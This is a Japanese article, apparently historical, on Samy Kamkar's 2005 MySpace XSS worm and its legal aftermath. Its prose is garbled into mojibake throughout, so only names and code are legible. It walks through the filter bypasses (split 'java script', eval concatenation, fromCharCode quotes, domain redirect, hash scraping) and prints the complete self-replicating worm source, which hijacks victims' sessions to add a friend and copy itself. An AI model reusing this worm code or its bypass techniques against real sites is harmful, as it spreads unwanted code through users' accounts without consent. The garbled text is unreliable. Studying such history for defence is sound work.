ããã¯ãã¹ãŠã2005幎10æ4æ¥ã®çå€äžé ãæŽããããµã³ãŒã«ã¹ã®è¡ã§èµ·ãããŸããã ãã®åŸã19æ³ã®ããã«ãŒSamy KamkaãããSamy wormããšããŠç¥ããããã®ããªãªãŒã¹ããŸããã ããã¯ãWebã»ãã¥ãªãã£ã®äžçãæ°žä¹ ã«å€ããæåã®æéã®èªå·±æ¡æ£åãŠã€ã«ã¹ã§ããã
16æ³ã§åŠæ ¡ãèŸãã17æ³ã§FonalityãšãããœãããŠã§ã¢ã¹ã¿ãŒãã¢ãããå§ããåŸãKamkaã¯èªåã®è¡åãéåžžã«ç°¡åã«èª¬æããŸããã
ãã¯ãããžãŒã®åéã«æéãäžãããã£ãã ãã§ãã
ã¯ãŒã ãå§ãŸã1é±éåã«ãã¹ãŠãå§ãŸããŸããã åœæãMySpaceã¯ãŠãŒã¶ãŒããããã¡ã€ã«ãèªç±ã«ã«ã¹ã¿ãã€ãºã§ããããã«ããHTMLã³ãŒãã䜿çšã§ããããã«ããŸãããããã«ããããããã¡ã€ã«ãã«ã©ãã«ã§ãã°ãã°çã¿ã䌎ã衚瀺ã«ã€ãªãããŸããã ãã ããMySpaceã®ãã¹ãŠãã«ã¹ã¿ãã€ãºã§ããããã§ã¯ãããŸããã ãŠãŒã¶ãŒãã¢ããããŒãã§ããåçã¯12æãŸã§ã§ããã å€ãã®äººããã®å¶éãåé¿ããæ¹æ³ãå¿é ããŠããŸããã ããã§Kamkaã¯ãMySpaceã調æ»ããŠããµã€ããã ãŸããä»ã®ãŠãŒã¶ãŒãã§ããªãã£ãããšãå®è¡ããæ¹æ³ãèŠã€ãå§ããŸããã ããã«åœŒã¯åœŒã®ãããã£ãŒã«ã«13æã®åçãã¢ããããŒãããæåã®äººã§ããã
ãŸãããŠãŒã¶ãŒã¯ãé¢ä¿ãåã§çãéžæãããŸããã ããããããŠã³ã¡ãã¥ãŒã«ã¯ãçµå©ãç¬èº«ã亀éãªã©ã®æšæºãªãã·ã§ã³ãå«ãŸããŠããŸããã ãããããã®ç¬éã«é¢ä¿ãæã£ãŠãããµããŒã¯ããé¢ä¿ã®äžã§ãç¹å¥ãªå°äœãéç«ããã瀺ãããšãã§ããããšãæãã§ããŸããã ãããŠããã°ããããŠãnè¡ã®ã³ãŒãã䞊ã¹æ¿ããŠã圌ã¯å ã®ã¢ã€ãã¢ãå®çŸããããšãã§ããŸããã ãµããèšã£ãããã«ïŒ
ãããè¡ããšããã«ãããŒãžã§ã»ãšãã©ãã¹ãŠã®ããšãã§ããããã«ãªã£ãããšã«æ°ä»ããŸããã
Kamkaã¯1é±éãä»ã®ãŠãŒã¶ãŒã«ã¯èŠããªãã¹ã¯ãªãããäœæããèªåã®ãããã¡ã€ã«ã蚪ãããã¹ãŠã®äººã«åœŒãå人ãšããŠè¿œå ããããšã匷å¶ããŸããã ãã®ã¹ã¯ãªããã¯ããç§ã®ããŒããŒïŒããããç§ã®äž»äººå ¬ã¯ãµããŒããšããã«ããŽãªã®äžã«ããã匷å¶ããããå人ã®ãããã¡ã€ã«ã«ç·ãä»ããŸãã ãããããã®åŸã圌ã¯ãã®æ¹æ³ã§ãèªåã®ããŒãžã蚪ãã人ã ãã«çŠç¹ãåãããå Žåãå€ãã®å人ãäœãããšãã§ããªãããšã«æ°ä»ããŸããã ãã®ãããç¬åµçãªè¥è ãã¹ã¯ãªããã«ã蚪åè ã®ããŒãžã«èªå·±ã³ããŒããå¯èœæ§ãè¿œå ããŸããã ãã®éèŠãªç¬éã«ã圌ã¯èªå·±å¢æ®åã¯ãŒã ãäœæããŸããã
ãµããŒã«ãããšïŒ
ç§ã¯ã1ãæã§çŽ100人ãŸãã¯200人ã®å人ãã§ãããšèããŸããã ãããã®ããã€ãã¯æå¥ãèšãã§ãããããç§ã¯ããããåé€ããã ãã§åé¡ãããŸããã
ç¿æç®ãèŠãŸããšã圌ã¯200ãè¶ ããåéãªã¯ãšã¹ããèŠã€ããŸããã ãã®æç¹ã§ããµããŒã¯ã·ã§ãã¯ãåããŸãããã¯ãŒã ãäºæ³ãããã¯ããã«éãæ¡æ£ããããã§ãã 1æéåŸããªã¯ãšã¹ãã¯2åã«ãªããææ°é¢æ°çã«å¢å ãç¶ããŸããã ããããKamkaã¯MySpaceãæ¯æããå¿åã®æçŽãéããã¯ãŒã ã«ã€ããŠèŠåãããããæ¢ããæ¹æ³ã瀺ããŸããã ããããä»æ¥ãŸã§ã誰ãã圌ã®æçŽãèªããã©ããã¯è¬ã®ãŸãŸã§ãã
ååŸã®13æ30åã«ã¯ãè¥ãããã«ãŒã«ã¯ãã§ã«2500人以äžã®å人ãããŠã6000人以äžã®å人ãžã®ãªã¯ãšã¹ãããããŸããã ããã»ã¹ã¯å¶åŸ¡äžèœã«ãªããŸããã
Kamkaã¯ããã®å€ã«èµ·ãã£ãããšããã¹ãŠèª¬æããããã°æçš¿ãæçš¿ããŸããã ãµããæãåºãããã«ïŒ
人ã ã¯æåéãç§ã圌ãã®ããŒãžããããã³ã°ãã人ç©ãšããŠå ±åããæçŽã§ç§ãå§åããŸããã çµå±ã®ãšããã圌ãã®ããŒããŒã®ãªã¹ãã«èŒããã®ã¯ç§ã®ååã§ããã
誰ãç§ã蚎ããŠããªãããšãæã¿ãŸãã
æ°æéåŸãSamyã¯Chipotliã§ããªããŒãé£ã¹ã«è¡ããMySpaceã®ãããã£ãŒã«ããã§ãã¯ããããã«å®¶ã«æ»ããŸããã ãã®ç¬éã圌ã¯ã»ãŒ100äžäººã®å人ããã®ãªã¯ãšã¹ãããããŸããã ãããŠãããã«åœŒã圌ã®ããã°ã«æžãããã®ããããŸãïŒ
ç§ã¯äººæ°ããããŸãã ããã¯å ¬åŒã§ãã
MySpaceãå©çšã§ããªããªãæ°ååã«ããªã¯ãšã¹ãã®æ°ã100äžãè¶ ããŸããã äŒç€Ÿã¯ãäœãèµ·ãã£ãã®ããèŠã€ããŠã¯ãŒã ãæé€ããããã«ããµã€ããééããå¿ èŠããããŸããã ãµãã¯èªããïŒ
ã²ã©ãã£ãã æ¬åœã«ããã¡ãªãã£ãããããã圌ã¯ãã¯ãäœãã§ããŸããã§ããã 圌ãã¯ãŒã ããªãªãŒã¹ãããšããã«ããã®ããã»ã¹ã¯ãã§ã«äžå¯éçã§ããããŠã€ã«ã¹ã¯ããèªäœã§æ¥éã«åºããã€ã€ãããŸãã æ°æéåŸããµã€ãã¯åã³å©çšå¯èœã«ãªããŸããããKamkaã®ãããã¡ã€ã«ã¯ãã§ã«åé€ãããŠããŸãã
äºä»¶ã®æ°ãæåŸã«MySpaceã®ã»ãã¥ãªãã£ãã£ã¬ã¯ã¿ãŒã«ãªã£ãKunel Anandã¯ãã¯ãŒã [Samy]ãæ»æãããšããäŒç€Ÿã«ã¯å®è³ªçã«ã»ãã¥ãªãã£ããŒã ããªããäœããã¹ããããããªãã£ããšèšããŸããã 誰ãåã«ãã®ãããªãã®ãèŠãããšããªãã£ãã®ã§ããã®ç¬éã¯ã¿ãŒãã³ã°ãã€ã³ãã§ããã
ã¯ãŒã [ãµããŒ]ã®é 眮æ¹æ³ãèŠãŠã¿ãŸãããã
MySpaceã¯ã»ãšãã©ã®ã¿ã°ããããã¯ããŸããå®éã«ã¯ã<aã>ã<Imgã>ãããã³<divã>ããããã<embedã>ãªã©ãä»ã®ã¿ã°ã®ã¿ãèš±å¯ãããŸãã ãã ãã<scriptã>ã<Bodyã>ãWith JavaScriptãªã©ã®ã¿ã°ã¯çµ¶å¯Ÿã«èš±å¯ãããŸããã ãã ããäžéšã®ãã©ãŠã¶ãŒã¯CSSã¿ã°å ã§JavaScriptãèš±å¯ããŸãã ããããã¹ãŠãããã«æ©èœãããã«ã¯JavaScriptãå¿ èŠã§ãã
äŸïŒ
<div style="background:url('javascript:alert(1)')">
åäžåŒçšç¬ŠãšäºéåŒçšç¬Šã¯ãã§ã«äœ¿çšãããŠããããããããã¯å ã§åŒçšç¬Šãããã«äœ¿çšããããšã¯ã§ããŸããã ããã«ãããJSã®ã³ãŒãã£ã³ã°ãå€§å¹ ã«è€éã«ãªããŸãã ãããåé¿ããã«ã¯ãåŒã䜿çšããŠJSãä¿åããååã§å®è¡ããŸãã
äŸïŒ
<div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')">
ããã§JavaScriptãäžéåŒçšç¬Šã§å²ãããšãã§ããŸãã ãã ããMySpaceã¯ã©ãããã§ããJavaScriptããšããåèªãåé€ããŸãã ããããäžéšã®ãã©ãŠã¶ã¯å®éã«java \ nscriptãjavascriptãšããŠè§£éããŸãã ïŒããã¯java <new line>ã¹ã¯ãªããã§ãïŒã
äŸïŒ
<div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')">
ããŠãäžéåŒçšç¬Šã䜿çšããŠããŸãããäºéåŒçšç¬Šãå¿ èŠãªå ŽåããããŸãã ããããåé¡ã¯MySpaceããšã¹ã±ãŒãããåŒçšç¬ŠãèŠéããªãããšã§ãã ãã ããJavaScriptã§10é²æ°ãASCIIã«å€æããã ãã§ãå®éã«åŒçšç¬ŠãååŸã§ããŸãã
äŸïŒ
<div id="mycode" expr="alert('double quote: ' + String.fromCharCode(34))" style="background:url('java script:eval(document.all.mycode.expr)')">
ã³ãŒãã衚瀺ãããŠãŒã¶ãŒã®ããŒãžã«ã³ãŒããæ®ãã«ã¯ãããŒãžã®ãœãŒã¹ã³ãŒããååŸããå¿ èŠããããŸãã ãœãŒã¹ã³ãŒããååŸããã«ã¯ãdocument.body.innerHTMLã䜿çšã§ããŸãã ãã ããMySpaceã¯innerHTMLãšããåèªãåé€ããŸãããããåé¿ããã«ã¯ãevalïŒïŒã䜿çšããŠ2ã€ã®ã·ãŒã±ã³ã¹ãè©äŸ¡ããããããé£çµããŠãinnerHTMLããååŸãã䟡å€ããããŸãã
äŸïŒ
alert(eval('document.body.inne' + 'rHTML'));
ä»ã®ããŒãžãžã®å®éã®ã¢ã¯ã»ã¹äžã«ããããŒãã£ã³ã°ãã¬ãŒã ã䜿çšããããšæããŸãã ãã ããååãšããŠããã¬ãŒã ïŒé ããããã¬ãŒã ãïŒã¯ããã»ã©æçšã§ã¯ãªãããŠãŒã¶ãŒã«ãšã£ãŠã¯ãä»ã®äœãããç¶ãã»ã©æçœã§ã¯ãããŸããã AJAXïŒHTTP XMLïŒã䜿çšããŠãHTTPãã£ããã£ãå®è¡ããã³ãŒãããŠãŒã¶ãŒããŒãžã«ã³ããŒã§ããŸãã ãã ããMySpaceã¯ãXML-HTTPèŠæ±ã«å¿ èŠãªãonreadystatechangeããšããåèªãåé€ããŸãã ç¹°ãè¿ããŸããããããåé¿ããããã«æšå®å€ã䜿çšã§ããŸãã HTTP XMLã®ãã1ã€ã®å©ç¹ã¯ãMySpaceã§ã¢ã¯ã·ã§ã³ãå®è¡ããããã«å¿ èŠãªCookieãç°¡åã«éä¿¡ãããããšã§ãã
äŸïŒ
eval('xmlhttp.onread' + 'ystatechange = callback');
ãŠãŒã¶ãŒã®ãããã£ãŒã«ã«ã¢ã¯ã»ã¹ã§ããããã«ãªããšããã£ã©ã¯ã¿ãŒã®ãªã¹ãã«ãã¢ã¯ã»ã¹ã§ããããã«ãªããŸãã çŸåšã®ããŒããŒã®ãªã¹ããåé€ããå¿ èŠã¯ãããŸããããã®ãªã¹ãã«èªåãè¿œå ããã ãã§ãã ãããã¡ã€ã«ã«ã¢ã¯ã»ã¹ã§ããããçŸåšã®ããŒããŒã®ãªã¹ãã«ã¢ã¯ã»ã¹ããåŸã§äœ¿çšããããã«ä¿åã§ããŸãã äžèšã®ãã¹ãŠãšèšç®ã«ãããHTTP XMLèŠæ±ã䜿çšããŠãããè¡ãã®ã¯éåžžã«ç°¡åã§ãã å人ã®IDïŒãããã¡ã€ã«ã衚瀺ããå®éã®ãŠãŒã¶ãŒïŒãååŸããå¿ èŠãããå Žåãé€ããŸãã äžèšã®ããã«ãããŒãžã®ãœãŒã¹ã³ãŒãã«ã¢ã¯ã»ã¹ããããšã§ãããè¡ãããšãã§ããŸãã çå®ã¯ãç¹å®ã®èŠæ±ã«åŸã£ãŠããŒãžã§æ€çŽ¢ãå®è¡ããå¿ èŠãããããšã§ãã ããããåèªã«ããæ€çŽ¢ã¯ãšãªãäœæãããšãåé¡ãçºçããŸãã ã»ãšãã©ã®å Žåããã®åèªã¯ã³ãŒãå ã«ãããŸãã ãããã£ãŠããããŒãžã«ãäœãããå«ãŸããå Žåãäœããè¡ãããšããã¯ãšãªã¯åžžã«è¯å®çãªçµæã«ãªããŸãããã®ãäœããã¯ãŠãŒã¶ãŒã®ããŒãžã«ã³ããŒãããç¬èªã®ã³ãŒãã«å«ãŸããŠããããã§ãã evalïŒïŒé¢æ°ã䜿çšãããšããã®åé¡ãåé¿ã§ããŸãã
äŸïŒ
var index = html.indexOf('frien' + 'dID');
ãã®æç¹ã§ããã§ã«ããŒããŒã®ãªã¹ãããããŸãã ãã ããåå¿è ã®å Žåããåéã®è¿œå ãããŒãžã§XML-HTTPãªã¯ãšã¹ããå®è¡ããŠåéãäœãå¿ èŠããããŸãã ãããããã®åŸçªç¶ãããããšããããã¯åäœããŸããã ãããããªãã§ããïŒ profile.myspace.comã«ãããŸããããã¡ã€ã³www.myspace.comã§ãªã¯ãšã¹ããè¡ãå¿ èŠããããŸãã 倧äžå€«ã ãšæããããããŸããããHTTP XMLã§ã¯ãç°ãªããã¡ã€ã³åãæã€ãµã€ããžã®èŠæ±ã®éåä¿¡ãã§ããŸããã ãããåé¿ããããã«ãå®éã«ã¯åãURLã«ã¢ã¯ã»ã¹ããŸããããã¡ã€ã³ã¯www.myspace.comã§ãã åŒãç¶ãwww.myspace.comã«ä»£ãã£ãŠãããã¡ã€ã«ã衚瀺ã§ããŸãããã®ãããç®çã®wwwãã¡ã€ã³ã§ããŒãžããªããŒããããšããªã¯ãšã¹ããå®äºããããšãã§ããŸãã
äŸïŒ
if (location.hostname == 'profile.myspace.com') document.location = 'http://www.myspace.com' + location.pathname + location.search;
æåŸã«ããªã¯ãšã¹ããå®è¡ã§ããŸãã ã¯ããå®éã«ãªã¯ãšã¹ããéä¿¡ããããšã«ãã£ãŠã®ã¿ãå人ãè¿œå ããŸããã ãªããããèµ·ãã£ãŠããã®ã§ããïŒ çµå±ã®ãšããããã¹ãŠãæ£ããè¡ãããŸãã ããããåé¡ã¯ããã§ãã MySpaceã¯ããŒãžã«ã©ã³ãã ããã·ã¥ãçæããŠãªã¯ãšã¹ãã確èªããŸãïŒããšãã°ãããã®ãŠãŒã¶ãŒãåéãšããŠè¿œå ããŠãããããã§ããïŒãïŒã ãã£ãã·ã¥ããªã¯ãšã¹ããšãšãã«è»¢éãããªãã£ãå Žåããªã¯ãšã¹ãã¯åŠçãããŸããã ãã®ç¹ãåé¿ããã«ã¯ããã©ãŠã¶ãŒã®ããã«åäœãããŠãŒã¶ãŒãè¿œå ããåã«ããã·ã¥ãœãŒã¹ã解æããããã·ã¥ã転éãããšãã«ãªã¯ãšã¹ããéä¿¡ããå¿ èŠããããŸãã
ãªã¯ãšã¹ããå®äºãããããããŒããŒãã«èªåèªèº«ãè¿œå ããã¡ã€ã³ã³ãŒããæ¿å ¥ããå¿ èŠããããŸãã æçµçã«ãã³ãŒãã¯åãã»ã¯ã·ã§ã³ãããŒããŒãã«é 眮ãããã®ã§ãå®äºã®ããã«å¿ èŠãªãªã¯ãšã¹ãã¯1ã€ã ãã§ãã ãã ããæ°ããããã·ã¥ãååŸããã«ã¯ãæåã«ããŒãžãååŸããå¿ èŠããããŸãã ãããããã®åã«ãããã«çœ®ãããã³ãŒããåçŸããå¿ èŠããããŸãã æãç°¡åãªæ¹æ³ã¯ããœãŒã¹ã³ãŒããååŸããŠè§£æãã調æŽããããšã§ãã ããã¯æ©èœããŸãããã³ãŒãã¯ç ŽæããŸãã ãœãŒã¹ã³ãŒããæœåºãããªã¯ãšã¹ããé©åã«è¿œå ããã«ã¯ãæå·åãããURLãå¿ èŠã§ãã å¥åŠã§ãããããã§ãåäœããŸããã ã©ãããJavaScriptã®URLã³ãŒãã£ã³ã°ãšescapeïŒïŒé¢æ°ã¯å¿ èŠãªãã¹ãŠã®ããŒã¿ã衚瀺ããªããããåºåã«å¿ èŠãªããŒã¿ãååŸããããã«æåã§ããã€ãã®å€æŽãè¡ãå¿ èŠããããŸãã Kamkaã®å Žåãšåæ§ã«ããããããç§ã®ããŒããŒã®ã»ãšãã©ã¯Samiã§ãããè¿œå ããŸãããã®åŸãã³ãŒãå šäœãæ¿å ¥ããŸãã èªå·±è€è£œã³ãŒãã§ããã¯ãŒã èªäœããããŸãã
<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
MySpaceåŽã§ãã¹ãŠã®ä¿®æ£ãè¡ã£ãåŸããã®ã³ãŒãã¯æããããªããªããæ©èœããªããªããŸãã
KamkaããªãªãŒã¹ããã¯ãŒã ã¯ãæ¥éãªèªå·±å¢æ®ã«ãããããããç¡å®³ã§ç¡å®³ã§ããããšãå€æããŸããã 圌ã¯å人ãè¿œå ãããã¹ãŠãè¡ã£ããããææããããããã¡ã€ã«ã«ããã€ãã®è¡ãå ¥åããã ããããã«ã ã«ãç¯çœªè ã§ããããæªæãããå Žåã圌ã¯ä»ã®äººã®ãããã£ãŒã«ãç°¡åã«åŒãç¶ãããšãã§ããŸãã XSSã®ç¥ã§ããã¯ãã¹ãµã€ãã¹ã¯ãªããã£ã³ã°ãšããŠç¥ãããè¥ãããã«ãŒã䜿çšããææ³ã æ»æè ã¯ãã®å©ããåããŠãWebãµã€ãããã³ãŠãŒã¶ãŒã®ãã©ãŠã¶ãŒã«æªæã®ããã³ãŒããæ¿å ¥ããŸãã Webã»ãã¥ãªãã£ã«ç²ŸéããŠãã人ã ã¯ãã»ãšãã©ã®ãµã€ããKamkaãšåãããã«æ»æãããå¯èœæ§ãããããšãç¥ã£ãŠããŸããã ãããã[Samy]ã¯ãŒã ãç»å ŽãããŸã§ã誰ããã®è åšãçå£ã«åãæ¢ããŸããã§ããã åœæããŠã§ããµã€ãã®80ã90ïŒ ããã®ãããªæ»æã«å¯ŸããŠè匱ã§ããã ãã®åé¡ã¯éåžžã«æ³šç®ãéããOpen Web Application Security Projectã¯ããµã€ãçšã®APIãäœæãããŠãŒã¶ãŒãXSSã®è匱æ§ã«ãããããããšãªãããŒãžã§ã³ãŒãã䜿çšã§ããããã«ããªãã®åªåãããŸããã 2015幎ã«WhiteHatã®ã»ãã¥ãªãã£ã«ãã£ãŠåéãããããŒã¿ã«ãããšã10幎åŸãåãè匱æ§ãæ±ããŠããWebãµã€ãã¯47ïŒ ã ãã§ãã ãã®ã¯ãŒã ãå®èšŒããè匱æ§ã¯ãç§ãã¡ãèããŠãããããäžè¬çã§ãã
æ°å¹ŽåŸããŠã§ããµã€ããšãã©ãŠã¶ã¯ã¯ãã¹ãµã€ãã¹ã¯ãªããã£ã³ã°æ»æã«å¯Ÿããã»ãã¥ãªãã£ã匷åããŸããããããã«æåãªæ»æãæã¡è² ãããŸããã ããšãã°ã2013幎ã«ã¯ãããã€ãã®Yahooã¡ãŒã«ããã¯ã¹ãåæ§ã®è匱æ§ã®ããã«ãããã³ã°ãããŸããã ãããŠæšå¹Žãããã«ãŒã¯TweetDeckã§XSSãã°ãçºèŠãããµã€ãã«è¿·æãªãããã¢ããã衚瀺ã§ããããã«ãªããŸããã
ç¡å®³ãªæå³ãšã¯ãŒã ã®éå§çç±ã説æããããã°æçš¿[Samy]ã«ãããããããKamkaã¯æ³åŸã®åé¡ãå®å šã«åé¿ããããšãã§ããŸããã§ããã 圌ãã¯ãŒã ããªãªãŒã¹ããŠãã6ãæåŸãã·ãŒã¯ã¬ãããµãŒãã¹ã¯ãé»åç¯çœªã¿ã¹ã¯ãã©ãŒã¹ãšãšãã«ã圌ã®ã¢ããŒããšãªãã£ã¹ã®æ玢什ç¶ãåãåããŸããã 圌ããæŒåãããåœå±ïŒã©ãããããã3å°ã®ãã¹ã¯ãããã³ã³ãã¥ãŒã¿ãŒããã¹ãŠã®å€éšãã©ã€ãã ããµã³ãŒã«ã¹é¡ã®åŒè·å£«ãã³ã³ãã¥ãŒã¿ãŒç¯çœªãåçº ç¹ã«ãCalifornia Criminal Codeã«åºã¥ãã³ã³ãã¥ãŒã¿ãŒã·ã¹ãã ãžã®ãŠã€ã«ã¹ææã
æãã£ããã«ã³ã«ãæãåºãã
é«æ ¡åæ¥èšŒææžããæã£ãŠããªãã£ãã®ã§ãã³ã³ãã¥ãŒã¿ãŒã䜿ãç¶ããããšãã§ãããã©ããã¯æ¬åœã«éèŠã§ããã ãããç§ãæã£ãŠãããã¹ãŠã§ããKamkaã®åŒè·å£«ãšå°å ã®æ€å¯å®ã¯ã1幎ã®éãè¥ãããã«ãŒã«å¯Ÿããæ眪ã®æ眪ãè°è«ããŸããã ãµãèªèº«ã¯é®æãããããšã¯ãããŸããã§ãããããã¯ãã¹ãŠã圌ãæ眪ãèªããã³ã³ãã¥ãŒã¿ãŒã·ã¹ãã ãžã®å®éã®ã¢ã¯ã»ã¹ãªãã«3幎éã®ä¿è·èŠ³å¯ã宣åããããšããäºå®ã§çµãããŸããã 圌ã¯ãã€ã³ã¿ãŒãããã«ã¢ã¯ã»ã¹ããããšãªããåœå±ã«ãã£ãŠç»é²ããã1å°ã®ã³ã³ãã¥ãŒã¿ãŒã®ã¿ã䜿çšããæš©å©ãæããŠããŸããã
圌ã¯ãŸã ã¹ã¿ãŒãã¢ããã®ãªãŒããŒãšããŠåãããšãã§ããã¯ãŒã ã«ã€ããŠè©±ãããã«ããŸããŸãªäŒè°ã«æåŸ ãããŸããã 2007幎ã圌ã¯OWASPïŒWASC AppSecäŒè°ã§Webã»ãã¥ãªãã£ã®å°é家ã§ããWhiteHatã®åµèšè ã§ããJeremiah Grossmanã«äŒããŸããã ã ïŒãããã®Tã·ã£ãã¯ãªã³ã©ã€ã³ã§è³Œå ¥ã§ããŸããïŒ
ã¯ãŒã ã®3幎åŸã®2008幎ãã«ã ã«ã¯æ³å»·ã«æ»ããè£å€æéãççž®ãããŸããã å¶éãã解æŸãããŠãSamyã¯æåã«Apple Storeã®ãµã³ã¿ã¢ãã«ã«è¡ããããã§æ°ããã©ããããããè³Œå ¥ããŸããã ãã®åŸã圌ã¯æå¯ãã®ã¹ã¿ãŒããã¯ã¹ã«è¡ããŸããã 圌ã®å¯äžã®ç®æšã¯ãã©ããããããéããŠã€ã³ã¿ãŒãããã«æ¥ç¶ããããšã§ããã
ãµããæãåºãããã«ãMySpaceã§ã®äºä»¶ã®åã圌ã¯è¬èã§å åçã§å æ°ãªç·ã§ããã ããããã€ã³ã¿ãŒãããã«ã¢ã¯ã»ã¹ããã«3幎ééãããåŸã圌ã¯ä»ã®ããšãããªããã°ãªããŸããã§ããã ãããŠãããã¯åœŒã倧ããå€ããŸããã